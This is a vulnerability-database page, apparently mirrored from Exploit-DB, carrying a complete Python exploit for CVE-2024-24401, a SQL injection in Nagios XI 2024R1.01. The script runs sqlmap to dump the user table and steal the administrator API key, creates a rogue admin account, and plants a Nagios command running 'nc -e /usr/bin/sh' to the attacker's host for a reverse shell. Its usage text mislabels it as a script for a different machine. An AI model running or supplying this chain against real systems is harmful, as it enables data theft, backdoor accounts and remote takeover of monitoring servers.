Vulners
Lucene search
Nagios XI Version 2024R1.01 - SQL Injection
ποΈΒ 25 Mar 2024Β 00:00:00Reported byΒ Jarod Jaslow (MAWK)TypeΒ 
Β exploitdbπΒ www.exploit-db.comπΒ 336Β Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Nagios XI Version 2024R1.01 - SQL Injection Exploit | 27 Mar 202400:00 | β | zdt |
 | Exploit for SQL Injection in Nagios Nagios_Xi | 8 Jan 202605:14 | β | githubexploit |
| Exploit for SQL Injection in Nagios Nagios_Xi | 18 Feb 202420:05 | β | githubexploit |
 | CVE-2024-24401 | 26 Feb 202418:26 | β | circl |
 | Nagios XI SQL Injection Vulnerability | 26 Feb 202400:00 | β | cnnvd |
 | CVE-2024-24401 | 26 Feb 202400:00 | β | cve |
 | CVE-2024-24401 | 26 Feb 202400:00 | β | cvelist |
 | Nagios XI < 2024R1.0.2 Multiple Vulnerabilities | 1 Mar 202400:00 | β | nessus |
 | Vulnerabilities fixed in Nagios XI | 22 Feb 202400:00 | β | ncsc |
 | CVE-2024-24401 | 26 Feb 202417:15 | β | nvd |
10
# Exploit Title: NAGIOS XI SQLI
# Google Dork: [if applicable]
# Date: 02/26/2024
# Exploit Author: Jarod Jaslow (MAWK) https://www.linkedin.com/in/jarod-jaslow-codename-mawk-265144201/
# Vendor Homepage: https://www.nagios.com/changelog/#nagios-xi
# Software Link: https://github.com/MAWK0235/CVE-2024-24401
# Version: Nagios XI Version 2024R1.01
# Tested on: Nagios XI Version 2024R1.01 LINUX
# CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401
#
import requests
import subprocess
import argparse
import re
import urllib3
import os
import random
import string
from colorama import Fore, Style
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def serviceLogin(user,password):
r = requests.post(f'http://{IP}/nagiosxi/api/v1/authenticate?pretty=1',data={'username':user,'password':password,"valid_min":"5"},verify=False)
print(f"{Fore.MAGENTA}[+] Authenticating with captured credtials to API....")
match = re.search(r'auth_token": "(.*)"',r.text)
if match:
token = match.group(1)
print(f'{Fore.MAGENTA}[+] Token: ' + token)
r = requests.get(f'http://{IP}/nagiosxi/login.php?token={token}', verify=False)
cookie = r.headers['Set-Cookie']
cookie = cookie.split(',')[0]
match = re.search(r'nagiosxi=(.*);', cookie)
cookie = match.group(1)
print(f"{Fore.MAGENTA}[+] Auth cookie is: " + cookie)
return cookie
else:
print(f'{Fore.RED}[-] Authentication Failed..{Style.RESET_ALL}')
exit()
def sqlmap(IP,username,password):
print(f'{Fore.MAGENTA}[+] Starting SQLMAP...')
session = requests.session()
s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)
data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": username, "password": password, "loginButton": ''}
s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)
print(f"{Fore.MAGENTA}[+] Authenticated as User..")
print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")
s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}
session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)
print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")
newPass = "mawk"
data = {"page": "/nagiosxi/login.php", "pageopt": "changepass", "nsp": nsp,"current_password": password, "password1": newPass, "password2": newPass, "reporttimesubmitbutton": ''}
session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)
s= session.get(f'http://{IP}/nagiosxi/')
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
cookie = s.cookies.get('nagiosxi')
sqlmap_command = f'sqlmap --flush-session -u "http://{IP}/nagiosxi//config/monitoringwizard.php/1*?update=1&nextstep=2&nsp={nsp}&wizard=mysqlserver" --cookie="nagiosxi={cookie}" --dump -D nagiosxi -T xi_users --drop-set-cookie --technique=ET --dbms=MySQL -p id --risk=3 --level=5 --threads=10 --batch'
#print(sqlmap_command)
sqlmap_command_output = subprocess.Popen(sqlmap_command,shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True )
try:
for line in iter(sqlmap_command_output.stdout.readline, ''):
if "| Nagios Administrator |" in line:
match = re.search(r"Nagios Administrator \| (.*?) \|", line)
if match:
adminKey= match.group(1)
print(f"{Fore.MAGENTA}[+] Admin Key recovered: " + adminKey)
return adminKey
else:
print(f"{Fore.RED}[-] Could not pull Admin Key :(....{Style.RESET_ALL}")
exit()
break
print("[-] SQLMAP capture FAILED..")
sqlmap_command_output.terminate()
except KeyboardInterrupt:
print(f"{Fore.RED}[-] SQLMAP interrupted. Cleaning up...{Style.RESET_ALL}")
sqlmap_command_output.terminate()
sqlmap_command_output.communicate()
exit()
def createAdmin(IP,adminKey):
characters = string.ascii_letters + string.digits
random_username = ''.join(random.choice(characters) for i in range(5))
random_password = ''.join(random.choice(characters) for i in range(5))
data = {"username": random_username, "password": random_password, "name": random_username, "email": f"{random_username}@mail.com", "auth_level": "admin"}
r = requests.post(f'http://{IP}/nagiosxi/api/v1/system/user?apikey={adminKey}&pretty=1', data=data, verify=False)
if "success" in r.text:
print(f'{Fore.MAGENTA}[+] Admin account created...')
return random_username, random_password
else:
print(f'{Fore.RED}[-] Account Creation Failed!!! :(...{Style.RESET_ALL}')
print(r.text)
exit()
def start_HTTP_server():
subprocess.Popen(["python", "-m", "http.server", "8000"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def adminExploit(adminUsername, adminPassword, IP, LHOST,LPORT):
print(f"{Fore.MAGENTA}[+] Conducting mandatory password change...")
session = requests.session()
s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)
data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": adminUsername, "password": adminPassword, "loginButton": ''}
s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)
print(f"{Fore.MAGENTA}[+] Authenticated as admin..")
print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")
s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
nsp = match.group(1)
data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}
session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)
print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")
newAdminPass = adminUsername + adminPassword
data = {"page": "/nagiosxi/login.php", "pageopt": "changepass","current_password": adminPassword, "nsp": nsp, "password1": newAdminPass, "password2": newAdminPass, "reporttimesubmitbutton": ''}
session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)
print(f"{Fore.MAGENTA}[+] Creating new command...")
data = {"tfName": adminUsername, "tfCommand": f"nc -e /usr/bin/sh {LHOST} {LPORT}", "selCommandType": "1", "chbActive": "1", "cmd": "submit", "mode": "insert", "hidId": "0", "hidName": '', "hidServiceDescription": '', "hostAddress": "127.0.0.1", "exactType": "command", "type": "command", "genericType": "command"}
session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?type=command&page=1', data=data)
data = {"cmd": '', "continue": ''}
start_HTTP_server()
print(f"{Fore.MAGENTA}[+] Created command: " + adminUsername)
session.post(f'http://{IP}/nagiosxi/includes/components/nagioscorecfg/applyconfig.php?cmd=confirm', data=data)
data = {"search": adminUsername}
s = session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?cmd=view&type=command&page=1', data=data)
match = re.search(r"javascript:actionPic\('deactivate','(.*?)','", s.text)
if match:
commandCID = match.group(1)
print(f"{Fore.MAGENTA}[+] Captured Command CID: " + commandCID)
s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/?cmd=view&type=service")
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)
if match:
nsp = match.group(1)
s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/command_test.php?cmd=test&mode=test&cid={commandCID}&nsp={nsp}")
os.system("kill -9 $(lsof -t -i:8000)")
print(f"{Fore.RED}[+] CHECK UR LISTENER")
else:
print(f"{Fore.RED}[-] ERROR")
else:
print(f"{Fore.RED}[-] Failed to capture Command CID..{Style.RESET_ALL}")
if __name__ == '__main__':
ascii_art = f"""{Fore.LIGHTRED_EX}
ββββ ββββ ββββββ βββ ββββββ βββ ββββββββ ββββββββββββββ ββββββββββ βββββββββββββββββ
βββββ ββββββββββββββββ ββββββ ββββ ββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββ ββ ββββββββββ βββββββββββ βββββββββββββββββββ βββ ββββββββ
ββββββββββββββββββββββββββββββββββββ βββββββββββ ββββββββββββββββββ βββ ββββββββ
βββ βββ ββββββ ββββββββββββββββ βββ βββββββββββββββββββ βββββββββ βββ ββββββββ
βββ ββββββ βββ ββββββββ βββ βββ ββββββββ ββββββββββ βββββββββ βββ ββββββββ
{Style.RESET_ALL}
"""
print(ascii_art)
parser = argparse.ArgumentParser(description="AutoPwn Script for Bizness HTB machine", usage= "sudo Nagios.py <Target IP> <LHOST> <LPORT>")
parser.add_argument('IP' ,help= "Target IP ")
parser.add_argument('LHOST',help= "Local host")
parser.add_argument('LPORT' ,help= "Listening Port")
args = parser.parse_args()
min_required_args = 3
if len(vars(args)) != min_required_args:
parser.print_usage()
exit()
adminUsername, adminPassword = createAdmin(args.IP, sqlmap(args.IP,input(f"{Fore.MAGENTA}[+] Please insert a non-administrative username: "),input(f"{Fore.MAGENTA}[+] Please insert the password: ")))
print(f"{Fore.MAGENTA}[+] Admin Username=" + adminUsername)
print(f"{Fore.MAGENTA}[+] Admin Password=" + adminPassword)
adminExploit(adminUsername, adminPassword, args.IP,args.LHOST,args.LPORT)Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Mar 2024 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
EPSS0.57971
SSVC